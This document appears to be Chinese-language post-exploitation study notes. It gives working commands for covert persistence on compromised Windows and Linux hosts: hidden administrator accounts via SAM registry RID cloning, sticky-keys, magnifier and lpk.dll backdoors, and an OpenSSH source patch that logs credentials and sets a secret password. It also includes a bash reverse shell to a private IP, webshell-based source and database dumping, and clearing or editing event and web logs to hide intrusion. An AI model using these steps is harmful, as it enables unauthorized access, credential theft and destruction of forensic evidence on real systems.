网络安全 （十 后渗透）

windows

1. 用户账号后门
   net user
   net user a a/add
   net localgroup administrators a /add
   我的电脑—管理—本地用户组,在创建后的用户右击设置密码
   打开注册表regedit,选择SAM,添加一个everyone权限，完全控制
   找下管理员的名称，以及对应的类型名称0x1f4,
   再找到管理员的二进制数值，全选复制
   同样的操作，找到自己创建的用户，将管理员的二进制数值粘贴到自己创建的
   最后，把设置的everyone权限删除

   ---

   net user guest /active:yes
   net user guest 123.com
   net localgroup administrators guest /add

   ---

   隐藏账号：
   动support_388945a0这个用户
   电脑-管理-用户-设密码support_388945a0
   右击属性–拨入–允许远程访问

   我的电脑—管理—本地用户组,在创建后的用户 右击设置密码
   打开注册表regedit,选择SAM,添加一个everyone权限，完全控制
   找下管理员的名称，以及对应的类型名称0x1f4,
   再找到管理员的二进制数值，名称为f的表全选复制
   同样的操作，找到support_388945a0，将管理员的二进制数值粘贴到support_388945a0
   最后，把设置的everyone权限删除

   我的电脑–属性—开启远程桌面

2. lpk后门
   创建用户后
   利用lpk生成一个lpk.dll文件
   随后将lpk.dll文件传到目标服务器当中system32
   在连接目标3389页面上，按5次shift调出黏贴键
   随后再按设定好的键，输入密码，启动程序

3. 木马后门
   梦想时代

清痕迹—电脑–管理
事件查看器—安全性—右击清除所有事件

iis管理器—访问网站属性—日志记录属性
日志文件属性—我的电脑打开，对比删除访问记录

linux

1. 后门工具
   将两个工具上传后进行解压
   tar zxvf openssh-5.9p 1.tar.gz
   tar zxvf 0x06-openssh-5.9p 1.patch.tar.gz
   cd openssh-5.9p1.path/
   cp sshbd5.9p1.diff …/openssh-5.9p1
   cd …/openssh-5.9p1
   patch < sshbd5.9p1.diff //path 后门

   vi includes.h //修改后门密码，记录文件位置
   /*
   +#define ILOG “/tmp/ilog/” //记录登录到本机的用户名和密码
   +#define OLOG “/tmp/olog” //记录本机登录到远程的用户名和密码
   +#define SECRETPW “123456” //后门的密码
   */

   yum install -y openssl openssl-devel pam-devel
   ./configure --prefix=/usr --sysconfdir=/etc/ssh --with-pam --with-kerberos5

   //如果出现问题安装zlib
   //yum install -y zlib zlib -devel

   make && make install
   service sshd restart //重启sshd
   登陆ssh

清痕迹
var/log/httpd/access_log
etc/httpd/loga/access_log

直接修改文件，将ip 访问的网站全部改掉
vim var/log/httpd/access_log

---

源码打包

asp 源码打包生成HSH.mdb
在木马的同一级目录下访问HSH.mdb，进行下载
在本地访问用于打包的马进行解包

php源码打包  nosafe.php马 在根目录下最下方有全选
然后选择压缩

脱裤：
数据管理—脱库马

---

反弹shell。

echo “bash -i >& /dev/tcp/192.168.31.237/4444 0>&1” | bash

bash -i : bash是Linux下一个常见的shell，-i参数表示产生一个交互式的shell

/dev/tcp/192.168.175.134/8080 : /dev/tcp|udp/ip/port是一个Linux中比较特殊的一个文件，如果在Linux上访问就会发现这个文件并不存在，其含义是让主机与目标主机ip在端口port建立一个tcp或udp连接

0>&1：将标准输入0输出重定向至标准输出1。或者可以这么理解，将标准输入0和标准输出1合并，在重定向至1，因为前面已经将标准输出1重定向至/dev/tcp/192.168.175.134/8080，所以现在标准输入0和标准输出1都指向/dev/tcp/192.168.175.134/8080。
echo + | bash是将中间具有交互式shell通过管道赋予bash

---

shift后门
将 C:\WINDOWS\system32\dllcache\sethc.exe 删除，这个文件夹中放着缓存，如果不删除就会自动变回去。

删除 C:\WINDOWS\system32\ 下的 sethc.exe 文件。

重命名 C:\WINDOWS\system32\ 下的 cmd.exe 为 sethc.exe 。

按下 5下 shift 即可弹出管理权限的 DOS 窗口。

---

放大镜后门

创建 magnify.bat

@echo off
net user administrator$ woaijiushi /add
net localgroup administrators hack$ /add
%Windir%\system32\nagnify.exe
exit

利用bat2com 等工具把Bat文件转换成exe文件，
将生成的 magnify.exe 分别替换掉 C:\WINDOWS\system32\dllcache 下的 magnify.exe 和C:\WINDOWS\system32\ 下的 magnify.exe

登陆时通过组合键 Win+U 调用。